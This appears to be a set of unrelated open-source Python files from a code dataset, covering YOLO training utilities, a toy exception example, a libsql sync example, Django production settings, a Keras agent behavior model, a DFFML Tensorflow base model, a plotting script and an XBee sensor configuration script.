get_batch_statistics(outputs, targets, iou_threshold):\n \"\"\" Compute true positives, predicted scores and predicted labels per sample \"\"\"\n batch_metrics = []\n for sample_i in range(len(outputs)):\n\n if outputs[sample_i] is None:\n continue\n\n output = outputs[sample_i]\n pred_boxes = output[:, :4]\n pred_scores = output[:, 4]\n pred_labels = output[:, -1]\n\n true_positives = np.zeros(pred_boxes.shape[0])\n\n annotations = targets[targets[:, 0] == sample_i][:, 1:]\n target_labels = annotations[:, 0] if len(annotations) else []\n if len(annotations):\n detected_boxes = []\n target_boxes = annotations[:, 1:]\n\n for pred_i, (pred_box, pred_label) in enumerate(zip(pred_boxes, pred_labels)):\n\n # If targets are found break\n if len(detected_boxes) == len(annotations):\n break\n\n # Ignore if label is not one of the target labels\n if pred_label not in target_labels:\n continue\n\n iou, box_index = bbox_iou(pred_box.unsqueeze(0), target_boxes).max(0)\n if iou >= iou_threshold and box_index not in detected_boxes:\n true_positives[pred_i] = 1\n detected_boxes += [box_index]\n batch_metrics.append([true_positives, pred_scores, pred_labels])\n return batch_metrics\n\ndef ap_per_class(tp, conf, pred_cls, target_cls):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.\n # Arguments\n tp: True positives (list).\n conf: Objectness value from 0-1 (list).\n pred_cls: Predicted object classes (list).\n target_cls: True object classes (list).\n # Returns\n The average precision as 
computed in py-faster-rcnn.\n \"\"\"\n\n # Sort by objectness\n i = np.argsort(-conf)\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\n\n # Find unique classes\n unique_classes = np.unique(target_cls)\n\n # Create Precision-Recall curve and compute AP for each class\n ap, p, r = [], [], []\n for c in tqdm.tqdm(unique_classes, desc=\"Computing AP\"):\n i = pred_cls == c\n n_gt = (target_cls == c).sum() # Number of ground truth objects\n n_p = i.sum() # Number of predicted objects\n\n if n_p == 0 and n_gt == 0:\n continue\n elif n_p == 0 or n_gt == 0:\n ap.append(0)\n r.append(0)\n p.append(0)\n else:\n # Accumulate FPs and TPs\n fpc = (1 - tp[i]).cumsum()\n tpc = (tp[i]).cumsum()\n\n # Recall\n recall_curve = tpc / (n_gt + 1e-16)\n r.append(recall_curve[-1])\n\n # Precision\n precision_curve = tpc / (tpc + fpc)\n p.append(precision_curve[-1])\n\n # AP from recall-precision curve\n ap.append(compute_ap(recall_curve, precision_curve))\n\n # Compute F1 score (harmonic mean of precision and recall)\n p, r, ap = np.array(p), np.array(r), np.array(ap)\n f1 = 2 * p * r / (p + r + 1e-16)\n\n return p, r, ap, f1, unique_classes.astype(\"int32\")\n\n\ndef build_targets(pred_boxes, pred_cls, target, anchors, ignore_thres):\n '''\n pred_boxes:[num_samples, num_anchors, grid_size, grid_size, 4]\n pred_cls:[num_samples, num_anchors, grid_size, grid_size, num_classes]\n target: [num_object, 6] 其中每一行的6个数据分别为:sample_index, classes_index, x, y, w, h详情见datasets.py中的ListDataset类,sample_index表示属于那个样本图片\n anchors:[num_anchors, 2] 当前尺度情况下的\n ignore_thres: int 忽略阈值\n '''\n\n # cuda\n ByteTensor = torch.cuda.ByteTensor if pred_boxes.is_cuda else torch.ByteTensor\n FloatTensor = torch.cuda.FloatTensor if pred_boxes.is_cuda else torch.FloatTensor\n\n nB = pred_boxes.size(0) # num_samples\n nA = pred_boxes.size(1) # num_anchors\n nC = pred_cls.size(-1) # num_classes\n nG = pred_boxes.size(2) # grid_size\n\n # Output tensors\n obj_mask = ByteTensor(nB, nA, nG, nG).fill_(0) # [num_samples, num_anchors, grid_size, grid_size] 全0填充\n noobj_mask = ByteTensor(nB, nA, nG, nG).fill_(1) # 全1填充\n class_mask = FloatTensor(nB, nA, nG, nG).fill_(0) # 全0\n iou_scores = FloatTensor(nB, nA, nG, nG).fill_(0) # 全0\n tx = FloatTensor(nB, nA, nG, nG).fill_(0) \n ty = FloatTensor(nB, nA, nG, nG).fill_(0)\n tw = FloatTensor(nB, nA, nG, nG).fill_(0)\n th = FloatTensor(nB, nA, nG, nG).fill_(0)\n tcls = FloatTensor(nB, nA, nG, nG, nC).fill_(0) # [num_samples, num_anchors, grid_size, grid_size, num_classes] 全0填充\n\n # 转换成相对于方框的位置\n target_boxes = target[:, 2:6] * nG # [num_samples, 4] 原本是归一化尺度,放大到当前尺度\n gxy = target_boxes[:, :2] # [num_object, 2] 中心坐标x,y\n gwh = target_boxes[:, 2:] # [num_object, 2] 框的w,h\n \n # 计算iou最大者\n ious = torch.stack([bbox_wh_iou(anchor, gwh) for anchor in anchors]) # 计算每个anchor和目标框的iou,这里用到了广播机制 [num_anchors, num_object]\n best_ious, best_n = ious.max(0) # 根据iou,计算每个真值框由哪个预设anchor预测,best_n为anchors的索引值,best_ious为相应的最大iou值,形状均为[num_object]\n\n # 获取相应值,调整格式,方便后面计算\n b, target_labels = target[:, :2].long().t() # [num_object, 2] --> [2, num_object], 每一列为sample_index, classes_index, b为sample_index,target_labels为classes_index\n gx, gy = gxy.t() # [2, num_object] 中心坐标\n gw, gh = gwh.t() # [2, num_object] w,h\n gi, gj = gxy.long().t() # [2, num_object] 取正,取到网格格点\n\n # 设置mask\n obj_mask[b, best_n, gj, gi] = 1 # iou最大的那个gird负责预测\n noobj_mask[b, best_n, gj, gi] = 0 # 与obj_mask意义相反\n\n # 当iou超过忽略阈值时,将noobj mask设置为零,表示该网格有物体\n for i, anchor_ious in enumerate(ious.t()): # ious.t() ---> [num_object, num_anchors]\n noobj_mask[b[i], 
anchor_ious > ignore_thres, gj[i], gi[i]] = 0\n \n # 论文公式 实际预测的是tx,ty,为偏移格点的偏移量,tw,th为宽高和anchor宽高比的对数,这里计算的是真值\n tx[b, best_n, gj, gi] = gx - gx.floor()\n ty[b, best_n, gj, gi] = gy - gy.floor()\n tw[b, best_n, gj, gi] = torch.log(gw / anchors[best_n][:, 0] + 1e-16)\n th[b, best_n, gj, gi] = torch.log(gh / anchors[best_n][:, 1] + 1e-16)\n\n # label one-hot编码\n tcls[b, best_n, gj, gi, target_labels] = 1\n\n # class_mask 表示分类正确的那个位置置为1\n class_mask[b, best_n, gj, gi] = (pred_cls[b, best_n, gj, gi].argmax(-1) == target_labels).float()\n # 计算预测的框和真实框的iou值\n iou_scores[b, best_n, gj, gi] = bbox_iou(pred_boxes[b, best_n, gj, gi], target_boxes, x1y1x2y2=False)\n\n tconf = obj_mask.float()\n return iou_scores, class_mask, obj_mask, noobj_mask, tx, ty, tw, th, tcls, tconf\n","repo_name":"ziyaxuanyi/my-yolo","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11862,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31924612463","text":"def error_example():\n try:\n user_input = int(input(\"Please enter your number for division: \"))\n \n while user_input > 0:\n number_divide = user_input / 0\n \n except NameError:\n print('Wrong name type')\n \n except ValueError:\n print('Wrong value error')\n \n except ZeroDivisionError:\n print('You cannot divide by 0!')\n \nerror_example()\n ","repo_name":"MikeTheMarketer/errors-and-exception-handling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74358417513","text":"import libsql_experimental\n\ncon = libsql_experimental.connect(\"hello.db\", sync_url=\"http://localhost:8080\",\n auth_token=\"\")\n\ncon.sync()\n\ncur = con.cursor()\n\ncur.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER, email TEXT);\")\ncur.execute(\"INSERT INTO users VALUES (1, 'penberg@iki.fi')\")\n\nprint(cur.execute(\"SELECT * FROM users\").fetchone())\n","repo_name":"libsql/libsql-experimental-python","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"18535928422","text":"import os\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom carbon0.settings.base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\n# Configure the Sentry SDK (this way we can still get error logs)\nsentry_sdk.init(\n dsn=str(os.getenv(\"SENTRY_DSN\")),\n integrations=[DjangoIntegration()],\n traces_sample_rate=1.0,\n # associate users to errors\n send_default_pii=True,\n)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = str(os.getenv(\"SECRET_KEY\"))\n\nALLOWED_HOSTS = [\"carbon0.herokuapp.com\", \"playcarbon0.com\"]\n\n# File paths for the Zeron model files\nDIET_ZERON_PATHS = [str(os.getenv(\"DIET_GLB\")), str(os.getenv(\"DIET_USDZ\"))]\nTRANSIT_ZERON_PATHS = [str(os.getenv(\"TRANSIT_GLB\")), str(os.getenv(\"TRANSIT_USDZ\"))]\nTREE_ZERON_PATHS = [str(os.getenv(\"TREE_GLB\")), str(os.getenv(\"TREE_USDZ\"))]\nRECYCLING_ZERON_PATHS = [\n str(os.getenv(\"RECYCLING_GLB\")),\n str(os.getenv(\"RECYCLING_USDZ\")),\n]\nAT_ZERON_PATHS = [str(os.getenv(\"AT_GLB\")), str(os.getenv(\"AT_USDZ\"))]\nUTIL_ZERON_PATHS = [str(os.getenv(\"UTIL_GLB\")), str(os.getenv(\"UTIL_USDZ\"))]\n\n# Mixpanel Project Token\nMP_PROJECT_TOKEN = 
str(os.getenv(\"MP_PROJECT_TOKEN\", \"\"))\n\n# Using Upgraded Authorization for S3 objects: \n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_SIGNATURE_VERSION = 's3v4'\nAWS_S3_REGION_NAME = 'us-east-2'\n","repo_name":"Carbon0-Games/carbon0-web-app","sub_path":"carbon0/carbon0/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"42323670954","text":"\"\"\"System Initialize\n\nThis script allows the user to initialize the analysis system.\n\nThis file can also be imported as a module and contains the following\nfunctions:\n\n * create_directory_structures\n * convert_fit_files_to_csv\n * initialize_critical_swim_speed\n * initialize_lactate_threshold\n * initialize_system\n * initialize_features\n\"\"\"\n\n\n# Packages\nimport os\nimport json\nimport pandas as pd\nfrom data_loader import DataLoader\nfrom configparser import ConfigParser\n# Self-defined modules\nimport utility\nfrom fit_file_convert import process_all\nathlete_info_json_path = utility.get_athlete_info_path()\n\n\ndef create_directory_structures():\n \"\"\" Create all the directories and folders that are needed for the project\n \"\"\"\n utility.create_all_folders()\n\n\ndef convert_fit_files_to_csv():\n internal_args_list = utility.get_fit_file_internal_args()\n if internal_args_list:\n for internal_args in internal_args_list:\n process_all.main(internal_args=internal_args)\n utility.SystemReminder().display_fit_file_converted(internal_args[1].split('=')[1][4:])\n\n\ndef initialize_configurations():\n \"\"\" Create all files, config and json, that are needed for the project\n \"\"\"\n initialize_json()\n initialize_config()\n\n\ndef initialize_config():\n athletes_with_csv = [file_name[:-4] for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.endswith('.csv')]\n athletes_with_fit = [' '.join(file_name.split('_')[1:]) for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.startswith('fit_')]\n config_path = utility.data_names_config\n parser = ConfigParser()\n if not os.path.exists(config_path):\n for section in ['DEFAULT', 'SPREADSHEET-DATA-SETS', 'ADDITIONAL-DATA-FOLDERS',\n 'CLEANED-SPREADSHEET-DATA-SETS', 'CLEANED-ADDITIONAL-DATA-SETS']:\n parser[section] = {}\n else:\n parser.read(config_path)\n\n for athletes_name in athletes_with_csv:\n if athletes_name.title() not in parser['SPREADSHEET-DATA-SETS'].keys():\n parser['SPREADSHEET-DATA-SETS'][athletes_name] = '{}.csv'.format(athletes_name.title())\n if athletes_name.title() not in parser['CLEANED-SPREADSHEET-DATA-SETS'].keys():\n parser['CLEANED-SPREADSHEET-DATA-SETS'][athletes_name] = 'cleaned_spreadsheet/{}.csv'.format(athletes_name.title())\n for athletes_name in athletes_with_fit:\n if athletes_name.title() not in parser['ADDITIONAL-DATA-FOLDERS'].keys():\n parser['ADDITIONAL-DATA-FOLDERS'][athletes_name] = 'csv_{}'.format('_'.join(athletes_name.split(' ')))\n if athletes_name.title() not in parser['CLEANED-ADDITIONAL-DATA-SETS'].keys():\n parser['CLEANED-ADDITIONAL-DATA-SETS'][athletes_name] = 'cleaned_additional/{}'.format('_'.join(athletes_name.split(' ')))\n with open(config_path, 'w') as config_file:\n parser.write(config_file)\n\n\ndef initialize_json():\n athletes_names = [file_name[:-4] for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.endswith('.csv') ]\n if not os.path.exists(athlete_info_json_path):\n with 
open(athlete_info_json_path, 'w') as file:\n json.dump({}, file, indent=4)\n with open(athlete_info_json_path, 'r') as file:\n athletes_info_json = json.load(file)\n for athletes_name in athletes_names:\n if athletes_name.title() not in athletes_info_json:\n athletes_info_json[athletes_name.title()] = {\n \"athlete type\": None,\n \"gender\": None,\n \"age\": None,\n \"height\": None,\n \"pre weight\": None,\n \"post weight\": None,\n \"injuries\": None,\n \"critical swim speed\": None,\n \"joe freil lactate threshold\": None,\n \"andy coogan lactate threshold\": None,\n \"training load best models\": {\"running\": None, \"swimming\": None, \"cycling\": None,\n \"strength_training\": None, \"others\": None},\n \"performance best models\": {\"running\": None, \"swimming\": None, \"cycling\": None}\n }\n athletes_info_json[athletes_name.title()][\"training load best models\"] = {\"running\": None, \"swimming\": None, \"cycling\": None,\n \"strength_training\": None, \"others\": None}\n with open(athlete_info_json_path, 'w') as file:\n json.dump(athletes_info_json, file, indent=4)\n\n\ndef initialize_critical_swim_speed(athletes_name: str):\n ''' Initialize the critical swim speed of an athlete\n Parameters\n ----------\n athletes_name: str\n '''\n data_loader_additional = DataLoader('additional')\n cleaned_additional_data_filenames = data_loader_additional.load_cleaned_additional_data(athletes_name)\n\n def _calculate_css():\n first_50m_distance, first_50m_times, first_400m_distance, first_400m_times = [], [], [], []\n for file_name in [file_name for file_name in cleaned_additional_data_filenames if 'swimming' in file_name]:\n df = pd.read_csv(file_name)\n time, distance = list(df['time_in_seconds']), list(df['distance'])\n for i, d in enumerate(distance):\n distance_in_meters = int((d - distance[0]) * 1000)\n if abs(distance_in_meters-50) < 5:\n first_50m_times.append(time[i]-time[0])\n first_50m_distance.append(distance_in_meters)\n if abs(distance_in_meters-400) < 10:\n first_400m_times.append(time[i]-time[0])\n first_400m_distance.append(distance_in_meters)\n mean_dis_diff = sum(first_400m_distance)/len(first_400m_distance) - sum(first_50m_distance)/len(first_50m_distance)\n mean_time_diff = sum(first_400m_times)/len(first_400m_times) - sum(first_50m_times)/len(first_50m_times)\n return (mean_dis_diff/mean_time_diff)\n\n return _calculate_css()\n\n\ndef initialize_lactate_threshold(athletes_name: str):\n ''' Initialize the lactate threshold of an athlete\n Parameters\n ----------\n athletes_name: str\n '''\n data_loader_additional = DataLoader('additional')\n cleaned_additional_data_filenames = data_loader_additional.load_cleaned_additional_data(athletes_name)\n\n def _calculate_Joe_Freil_lactate_threshold():\n heart_rate_entry=[]\n for file_name in [file_name for file_name in cleaned_additional_data_filenames if 'running' in file_name]:\n temporary_list=[]\n df = pd.read_csv(file_name)\n if df['heart_rate'].isnull().values.any()==True:\n continue\n time, heart_rate = list(df['time_in_seconds']), list(df['heart_rate'])\n for i,t in enumerate(time):\n time_difference_current=time[i]-time[0]\n if 600 <= time_difference_current <= 1805:\n temporary_list.append(heart_rate[i])\n if abs(time_difference_current-1805)<5:\n heart_rate_entry=heart_rate_entry+temporary_list\n break\n average_heart_rate=sum(heart_rate_entry)/len(heart_rate_entry)\n return average_heart_rate\n\n def _calculate_Andy_Coogan__lactate_threshold():\n heart_rate_entry = []\n for file_name in [file_name for file_name in 
cleaned_additional_data_filenames if 'running' in file_name]:\n temporary_list = []\n df = pd.read_csv(file_name)\n if df['heart_rate'].isnull().values.any() == True:\n continue\n time, heart_rate = list(df['time_in_seconds']), list(df['heart_rate'])\n for i, t in enumerate(time):\n time_difference_current = time[i] - time[0]\n if time_difference_current <= 3605:\n temporary_list.append(heart_rate[i])\n if abs(time_difference_current - 3605) < 5:\n heart_rate_entry = heart_rate_entry + temporary_list\n break\n average_heart_rate = sum(heart_rate_entry) / len(heart_rate_entry)\n return average_heart_rate\n\n return _calculate_Joe_Freil_lactate_threshold(), _calculate_Andy_Coogan__lactate_threshold()\n\n\ndef initialize_system():\n \"\"\" Initialize the whole system\n \"\"\"\n utility.SystemReminder().display_initialization_start()\n create_directory_structures()\n convert_fit_files_to_csv()\n initialize_configurations()\n utility.SystemReminder().display_initialization_end()\n\n\ndef initialize_characteristics(athletes_name):\n with open(athlete_info_json_path, 'r') as file:\n athletes_info_json = json.load(file)\n athletes_css = initialize_critical_swim_speed(athletes_name)\n athletes_info_json[athletes_name.title()][\"critical swim speed\"] = athletes_css\n jf_threshold, ac_threshold = initialize_lactate_threshold(athletes_name)\n athletes_info_json[athletes_name.title()][\"joe freil lactate threshold\"] = jf_threshold\n athletes_info_json[athletes_name.title()][\"andy coogan lactate threshold\"] = ac_threshold\n with open(athlete_info_json_path, 'w') as file:\n json.dump(athletes_info_json, file, indent=4)\n\n\n\nif __name__ == '__main__':\n athletes_names = ['Eduardo Oliveira', 'Xu Chen', 'Carly Hart']\n initialize_system()\n\n","repo_name":"Data-Science-Project-G13/monitoring-athletes-performance","sub_path":"main/system_initialize.py","file_name":"system_initialize.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7117663803","text":"import pickle as pickle\n\nimport numpy as np\nfrom keras import Input, Model\nfrom keras.layers import Dense\nfrom keras.models import load_model\n\nfrom pursuit.agents.ad_hoc.models.base_model import BaseModel\n\n\nclass BehaviorModel(BaseModel):\n\n def __init__(self, model_size):\n super().__init__(model_size)\n self.x = None\n self.y = None\n self.model = None\n self.metric = []\n self.ids = None\n self.cache = {}\n\n def init(self, num_state_features, actions):\n self.x = np.zeros((0, num_state_features))\n self.y = np.zeros((0, 4))\n\n input = Input(shape=(num_state_features,))\n previous_layer = input\n for size in self.model_size:\n previous_layer = Dense(size, activation='selu')(previous_layer)\n output = Dense(4, activation='softmax')(previous_layer)\n\n model = Model(input, output)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n self.model = model\n self.ids = [x[0] for x in actions]\n\n def train(self, state, actions, fit=True, compute_metrics=True):\n for agent_id, action in actions:\n state_features = state.features_relative_agent(agent_id).reshape(1, -1)\n if self.x is None:\n self.init(state_features.shape[1], actions)\n # 1-hot encode\n actions_array = np.zeros((1, 4))\n actions_array[0, action] = 1\n\n # append to dataset\n self.x = np.append(self.x, state_features, axis=0)\n self.y = np.append(self.y, actions_array, axis=0)\n\n # compute accuracy\n if compute_metrics:\n predicted_y = 
self.predict(state)\n hits = [predicted_y[i] == actions[i][1] for i in range(len(actions))]\n self.metric.append(sum(hits)/len(actions))\n\n # train\n if fit:\n self.cache.clear()\n self.model.fit(self.x, self.y, epochs=100, verbose=1)\n\n def predict(self, state):\n if len(self.cache) >= 10*1000:\n print('cleared cache')\n self.cache.clear()\n\n if state not in self.cache:\n state_features = np.zeros((len(self.ids), len(self.x[0])))\n for i, agent_id in enumerate(self.ids):\n state_features[i] = state.features_relative_agent(agent_id).reshape(1, -1)\n\n predicted_y = np.array(self.model.predict(state_features))\n self.cache[state] = predicted_y\n\n predicted_y = self.cache[state]\n # return np.argmax(predicted_y, axis=1)\n return np.array([np.random.choice(range(4), p=p) for p in predicted_y])\n\n # def save(self, filename):\n # if self.model is not None:\n # self.model.save(filename + '.model')\n # d = dict(self.__dict__)\n # d.pop('model')\n # f = open(filename, 'wb')\n # pickle.dump(d, f)\n # f.close()\n\n\n # @staticmethod\n # def load(filename):\n # model = load_model(filename + '.model')\n # f = open(filename, 'rb')\n # attrs = pickle.load(f)\n # f.close()\n # obj = BehaviorModel(attrs['model_size'])\n # for key, value in attrs.items():\n # setattr(obj, key, value)\n # obj.model = model\n # return obj","repo_name":"goncalo-rodrigues/thesis","sub_path":"pursuit/agents/ad_hoc/models/behavior_model.py","file_name":"behavior_model.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3904789856","text":"import abc\nimport inspect\nimport pathlib\nimport importlib\nfrom dataclasses import dataclass\nfrom typing import List, Dict, Any\n\nfrom dffml.base import field\nfrom dffml.feature.feature import Feature, Features\nfrom dffml.source.source import Sources, SourcesContext\nfrom dffml.model.model import ModelContext, Model, ModelNotTrained\n\n\n@dataclass\nclass TensorflowBaseConfig:\n predict: Feature = field(\"Feature name holding target values\")\n features: Features = field(\"Features to train on\")\n location: pathlib.Path = field(\"Location where state should be saved\")\n steps: int = field(\"Number of steps to train the model\", default=3000)\n epochs: int = field(\n \"Number of iterations to pass over all records in a source\", default=30\n )\n hidden: List[int] = field(\n \"List length is the number of hidden layers in the network. Each entry in the list is the number of nodes in that hidden layer\",\n default_factory=lambda: [12, 40, 15],\n )\n\n\nclass TensorflowModelContext(ModelContext):\n \"\"\"\n Tensorflow based model contexts should derive from this model context. 
It\n    provides much of the bootstrapping, such as mapping data types to feature\n    columns.\n    \"\"\"\n\n    def __init__(self, parent):\n        super().__init__(parent)\n        self.tf = importlib.import_module(\"tensorflow\")\n        self.np = importlib.import_module(\"numpy\")\n\n    async def predict_input_fn(self, sources: SourcesContext, **kwargs):\n        \"\"\"\n        Uses the numpy input function with data from record features.\n        \"\"\"\n        x_cols: Dict[str, Any] = {\n            feature: [] for feature in self.parent.features\n        }\n        ret_records = []\n        async for record in sources.with_features(self.parent.features):\n            ret_records.append(record)\n            for feature, results in record.features(\n                self.parent.features\n            ).items():\n                x_cols[feature].append(self.np.array(results))\n        for feature in x_cols:\n            x_cols[feature] = self.np.array(x_cols[feature])\n        self.logger.info(\"------ Record Data ------\")\n        self.logger.info(\"x_cols:    %d\", len(list(x_cols.values())[0]))\n        self.logger.info(\"-----------------------\")\n        input_fn = self.tf.compat.v1.estimator.inputs.numpy_input_fn(\n            x_cols, shuffle=False, num_epochs=1, **kwargs\n        )\n        return input_fn, ret_records\n\n    async def train(self, sources: Sources):\n        \"\"\"\n        Train on data submitted via classify.\n        \"\"\"\n        input_fn = await self.training_input_fn(sources)\n        self.parent.model.train(\n            input_fn=input_fn, steps=self.parent.config.steps\n        )\n        self.is_trained = True\n\n    async def get_predictions(self, sources: SourcesContext):\n        if not self.is_trained:\n            raise ModelNotTrained(\"Train model before prediction.\")\n        # Create the input function\n        input_fn, predict = await self.predict_input_fn(sources)\n        # Makes predictions on classifications\n        predictions = self.parent.model.predict(input_fn=input_fn)\n        target = self.parent.config.predict.name\n\n        return predict, predictions, target\n\n\nclass TensorflowModel(Model):\n    def __init__(self, config):\n        super().__init__(config)\n        self._model = None\n        self.tf = importlib.import_module(\"tensorflow\")\n        self.feature_columns = self._feature_columns()\n        self.features = self._applicable_features()\n        self.is_trained = self.model_path.exists()\n\n    def _feature_columns(self):\n        \"\"\"\n        Converts records into training data\n        \"\"\"\n        cols: Dict[str, Any] = {}\n        for feature in self.config.features:\n            col = self._feature_feature_column(feature)\n            if not col is None:\n                cols[feature.name] = col\n        return cols\n\n    def _feature_feature_column(self, feature: Feature):\n        \"\"\"\n        Creates a feature column for a feature\n        \"\"\"\n        dtype = feature.dtype\n        if not inspect.isclass(dtype):\n            self.logger.warning(\n
                \"Unknown dtype %r. Could not create column\" % (dtype)\n            )\n            return None\n        if (\n            dtype is int\n            or issubclass(dtype, int)\n            or dtype is float\n            or issubclass(dtype, float)\n        ):\n            return self.tf.feature_column.numeric_column(\n                feature.name, shape=feature.length\n            )\n        self.logger.warning(\n            \"Unknown dtype %r. Could not create column\" % (dtype)\n        )\n        return None\n\n    def _applicable_features(self):\n        return [\n            name\n            for name in self.config.features.names()\n            if name in self.feature_columns\n        ]\n\n    @property\n    def model_path(self):\n        return self.location / \"DNNModel\"\n\n    async def __aenter__(self):\n        await super().__aenter__()\n        return self\n\n    async def __aexit__(self, exc_type, exc_value, traceback):\n        await super().__aexit__(exc_type, exc_value, traceback)\n\n    @property\n    @abc.abstractmethod\n    def model(self):\n        \"\"\"\n        Create the model and return the handle to it.\n        \"\"\"\n        raise (NotImplementedError(\"Cannot use model from base class.\"))\n","repo_name":"intel/dffml","sub_path":"model/tensorflow/dffml_model_tensorflow/tf_base.py","file_name":"tf_base.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"16990778873","text":"import matplotlib.pyplot as plt\n\n\ndef p(x):\n    f = x ** 3 - x + 2\n    return f\n\n\nx = []\nfor number in range(-5, 6):\n    x.append(number)\nprint(\"x_points: {}\".format(x))\ny = []\nfor value in x:\n    y.append(p(value))\nprint(\"y_values: {}\".format(y))\n","repo_name":"pandeydevendra/python_dev","sub_path":"ds_ml/plot/linear_algebra/cubic_parabola.py","file_name":"cubic_parabola.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36151353154","text":"#!/usr/bin/python3\nimport configparser\nimport binascii\nimport serial\nimport operator\nimport logging\nimport argparse\nimport threading\nimport time\nimport json\nfrom xbee.zigbee import ZigBee\nfrom xbee.helpers.dispatch import Dispatch\nimport cherrypy\n\n\n# TODO: Make sure that the lastvalues dictionary is synchronized\n# maps node name to its last received value\nlastvalues = {}\n# A queue used to send xbee messages\nxbeeque = None\n# Maps a node name to the serial number\nnametoserial = None\n\ndef h2b(hexcode):\n    return bytes.fromhex(hexcode)\n\ndef b2h(bytecode):\n    return binascii.hexlify(bytecode).decode(encoding='ascii')\n\ndef pintocommand(pname):\n    return pname.upper().encode(encoding='ascii', errors='strict')\n\n# Configuration values for the pins\npintovalue = {\n    'off' : h2b('00'),\n    'default' : h2b('01'),\n    'analog' : h2b('02'),\n    'digital' : h2b('03'),\n    'output_lo' : h2b('04'),\n    'output_hi' : h2b('05') }\n\npinlist = ['d0','d1','d2','d3','d4','d6','d7','p0','p1','p2']\n\n# Main methods\ndef config_client(xbee,dispatch,masterconfig,nodeconfig):\n    \"\"\"\n    Configures the sensor node\n    \n    Parameters\n    ----------\n    xbee : xbee object\n    dispatch : xbee dispatch\n    masterconfig : dict\n        Master configuration file\n    nodeconfig : dict\n        Node configuration file\n    \"\"\"\n\n    resp = threading.Event()\n    \n    serialnumber = ''\n    def response_handler(name,packet):\n        nonlocal serialnumber\n        if packet['frame_id'] == h2b('01'):\n            assert len(serialnumber) == 0\n            serialnumber += b2h(packet['parameter'])\n        if packet['frame_id'] == h2b('02'):\n            serialnumber += b2h(packet['parameter']) \n        resp.set()\n        \n        logging.debug('    Received packet : \"%s\"', str(packet).replace('\\n',' '))\n        \n    dispatch.register(\n        \"at_response_handler\", \n        response_handler,\n        lambda packet: (packet['id'] == 'at_response')\n    )\n\n    # Read the id of the xbee and determine whether it already is in the configuration file\n    resp.clear()\n    xbee.at(frame_id=h2b('01'),command=b'SH')\n    xbee.at(frame_id=h2b('02'),command=b'SL')\n    if not resp.wait(1):\n
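        # no reply to the SH/SL serial-number queries within the 1 s timeout\n        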
logging.critical('No response from the xbee, make sure that it is in API mode.')\n raise ValueError('No xbee response.') \n \n logging.info('Connected xbee with serial number \"%s\".', serialnumber)\n # Determine allowed node types\n logging.debug('Parsing node types from the main file')\n try:\n nodetypes = [nt for nt in masterconfig.keys() if nt != 'DEFAULT'] + ['MASTER']\n logging.debug('Loaded node types %s', nodetypes)\n networkid = masterconfig['DEFAULT']['networkid'] # assuming this was checked for existence and validity before\n except:\n logging.critical('Could not parse the main configuration file (default: xbeesens.cfg).')\n raise\n \n logging.debug('Parsing node configuration file.')\n try:\n if len(nodeconfig['DEFAULT']) > 0:\n logging.warning('Node configuration file must not contain any DEFAULT entries or a sensor named \"DEFAULT\". DEFAULT sensor will be ignored.')\n \n nodes = [(name,node) for name,node in nodeconfig.items() if name != 'DEFAULT' and node['serial'] == serialnumber]\n if len(nodes) > 1:\n logging.critical('Nodes with duplicate serial numbers in the configuration file.')\n raise ValueError('Nodes with duplicate serial numbers in the configuration file.')\n elif len(nodes) == 1:\n nodename = nodes[0][0]\n nodetype = nodes[0][1]['type']\n \n if nodetype not in nodetypes:\n logging.critical('Invalid type \"%s\" for node \"%s\" with serial number \"%s\". Allowed types are: %s.',nodetype,nodename,serialnumber,nodetypes)\n raise ValueError('Invalid node type.')\n else:\n logging.error('No node with serial number \"{1}\" defined in \"{0}\" (or the file does not exist). Please add the following configuration entry to the file e.g.:\\n[CustomNodeName]\\nserial = {1}\\ntype = \\n# Allowed types: {2}'.format(config['DEFAULT']['nodefile'], serialnumber, nodetypes))\n return\n \n except Exception as e:\n logging.critical('Could not parse the node configuration file \"%s\".', config['DEFAULT']['nodefile'])\n raise e\n \n if nodetype == 'MASTER':\n logging.info('Configuring a master node.')\n \n # Set network id\n logging.debug('Setting network id.')\n xbee.at(frame_id=h2b('0A'),command=b'ID',parameter=h2b(networkid))\n \n # Auto connect to the network\n logging.debug('Setting network autoconnect.')\n xbee.at(frame_id=h2b('06'),command=b'VJ',parameter=h2b('01'))\n \n \n else: # Dealing with a SENSOR node\n logging.info('Configuring a sensor node.')\n # ---- PARSE pin information\n logging.debug('Parsing pin configuration.')\n nodetypeinfo = masterconfig[nodetype]\n try:\n pinsparsed = ((pinname.replace('pin_',''),value) for pinname,value in nodetypeinfo.items() if pinname.startswith('pin_') )\n \n pinconfig = []\n for pname,ptype in 